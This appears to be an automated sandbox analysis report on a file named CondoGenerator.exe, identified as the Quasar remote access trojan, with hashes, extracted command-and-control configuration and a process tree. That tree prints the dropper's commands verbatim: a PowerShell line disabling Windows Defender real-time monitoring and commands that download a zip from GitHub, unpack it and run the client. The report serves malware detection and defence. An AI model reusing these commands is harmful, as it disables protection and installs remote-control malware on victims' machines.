Overview

overview

10

Static

static

3

CondoGenerator.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    35s
  • max time network
    43s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/09/2024, 16:25

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    CondoGenerator.exe

  • Size

    172KB

  • MD5

    d9e8b8cf49e93bb7e131df99d3e1b762

  • SHA1

    d61ce3d12e336bc9501f31c2a866a17cdcd524a5

  • SHA256

    51ee205a40e521ad6927023e5363a2254aa9c28804821319071a3b8f28d0547e

  • SHA512

    71417ed4d879fe9ad28f23ae324c3a551ce4d9431be6132f6966d6027218b7ae54fea389c760b03c1ec63c4ce0858d9d9e5e4a0dc6f20eea0b325cbc1d99641c

  • SSDEEP

    3072:mMobR7ezAjLOZvmX1c5GWp1icKAArDZz4N9GhbkrNEk1Oz9:7eR7eammUp0yN90QEd

Score
10/10
quasaroffice04executionpersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

192.168.1.77:4782

192.168.1.79:4782
Mutex

e819f327-90a2-4d90-a826-8b38a9c4f3d5

Attributes
  • encryption_key

    EFEBD005E03B8B8669985D9A167E2BEF9FFCA477

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CondoGenerator.exe
    "C:\Users\Admin\AppData\Local\Temp\CondoGenerator.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c "CondoGenerator.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4136
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3568
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/sleepysnz/skibidi/archive/refs/heads/main.zip' -OutFile 'skibidi.zip'"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Expand-Archive -Path 'skibidi.zip' -DestinationPath 'skibidi'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:656
      • C:\Users\Admin\Downloads\skibidi\skibidi-main\Client-built.exe
        "client-built.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:1636
      • C:\Windows\system32\timeout.exe
        timeout /t 2 /nobreak
        3⤵
        • Delays execution with timeout.exe
        PID:1936
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3288

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            62623d22bd9e037191765d5083ce16a3

            SHA1

            4a07da6872672f715a4780513d95ed8ddeefd259

            SHA256

            95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

            SHA512

            9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            c9440f609b37c332a43cb263763147b2

            SHA1

            2170fe47765f5a5d96c308a69ec20ceb2c1b0ed5

            SHA256

            a40b5dbda23d0a9e8a1aeb0556531b38b01d1dce9214d00a37f2478647b12741

            SHA512

            98a8a2bb691cbe4ed4aa7db63f3cf8607f214bf6db3422ea7037f9290fdff674efb672a6135997381410f2e84930cabca0f0299412512abcb8fc1da468b09ba3

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CondoGenerator.bat
            Filesize

            1KB

            MD5

            47ca12b5d46ae6bac11ab31df4ff35bb

            SHA1

            2c5466b4b04e407f1768e3826c002f23d79e627e

            SHA256

            7d07f0e80c623fcb3a029abbbae134b27694e3796b342bda82341ab2a6d6dbaf

            SHA512

            4aa8bc233c4cf4b5529a1651911575bb29cd9b4ce68dd6dd634a8fd084c6be85f571f447d6ea4147a58c470b6ac05f5f1e50bc022c009458a974a9e7d1a24b9a

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bcsxspd4.3ej.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\Downloads\skibidi.zip
            Filesize

            2.3MB

            MD5

            89f195606b36a7ebbcdef261f84ce791

            SHA1

            548aa03ffd842f0e90862203b37b3fcab449a21f

            SHA256

            0441f34c0995acb20d834b3ff4abb0c3a2719ab7a44577e5fac29e6b9bb851cd

            SHA512

            19519c45b12b0a632b3bb378c80799025cb4e6e6366f367ba779f825e49bf8790ef4c81c86fc044e4c3347fff21c87ef670f651d70e0fc0a375b4e5746beb146

            Download Submit

          • C:\Users\Admin\Downloads\skibidi\skibidi-main\CONDOG~1.EXE
            Filesize

            3.1MB

            MD5

            5da0a355dcd44b29fdd27a5eba904d8d

            SHA1

            1099e489937a644376653ab4b5921da9527f50a9

            SHA256

            e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f

            SHA512

            289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6

            Download Submit

          • C:\Users\Admin\Downloads\skibidi\skibidi-main\Client-built.exe
            Filesize

            3.1MB

            MD5

            7e1ed4c0bddfcd9753fa8a34369d2a09

            SHA1

            a72002b3e87c94524bb777fc50aadcd444597b28

            SHA256

            0d0646d4f062fab91f6dbcbcc5412e6ef550306b1a49e2353bc37fd24aa4660e

            SHA512

            cbcc8efa4d68e3e993dd0b8951d4e4fe0930d267ab99f0ad2f03a89e8f4d119210dccd4c5d4ad2b15d14125e852ef464564d6a88a41eaa936f6a6f2272123ff3

            Download Submit

          • C:\Users\Admin\Downloads\skibidi\skibidi-main\test.exe
            Filesize

            85KB

            MD5

            76e5b2935aad210eb83db2fd11b6d32a

            SHA1

            485402fa81efa28ba8c24d32d16d76e69c470224

            SHA256

            8258dbfeb33c23ebb17f11bf9f47e4516a3dd72ce46291eb0675604220d9f88b

            SHA512

            37d142efc70e7cdd48ece5b624daf8306de798ddd3f6d2f3d771a30bce49559afa1e8b7799538ffdbe1f4477c3e452d4a30d4273d6ad95227901ab3062ddeb2d

            Download Submit

          • memory/656-53-0x000001A8C9D90000-0x000001A8C9D9A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/656-52-0x000001A8C9DB0000-0x000001A8C9DC2000-memory.dmp

            Filesize

            72KB

            Download

          • memory/1464-40-0x0000029076B30000-0x0000029076D4C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/1464-31-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1464-34-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1464-35-0x0000029076B30000-0x0000029076D4C000-memory.dmp

            Filesize

            2.1MB

            Download

          • memory/1464-36-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1464-20-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1464-41-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1464-33-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1464-32-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/1636-66-0x000000001D630000-0x000000001D680000-memory.dmp

            Filesize

            320KB

            Download

          • memory/1636-65-0x00000000002A0000-0x00000000005C4000-memory.dmp

            Filesize

            3.1MB

            Download

          • memory/1636-67-0x000000001D740000-0x000000001D7F2000-memory.dmp

            Filesize

            712KB

            Download

          • memory/3568-3-0x00007FF819F83000-0x00007FF819F85000-memory.dmp

            Filesize

            8KB

            Download

          • memory/3568-14-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3568-13-0x00000189F0450000-0x00000189F0472000-memory.dmp

            Filesize

            136KB

            Download

          • memory/3568-18-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/3568-15-0x00007FF819F80000-0x00007FF81AA41000-memory.dmp

            Filesize

            10.8MB

            Download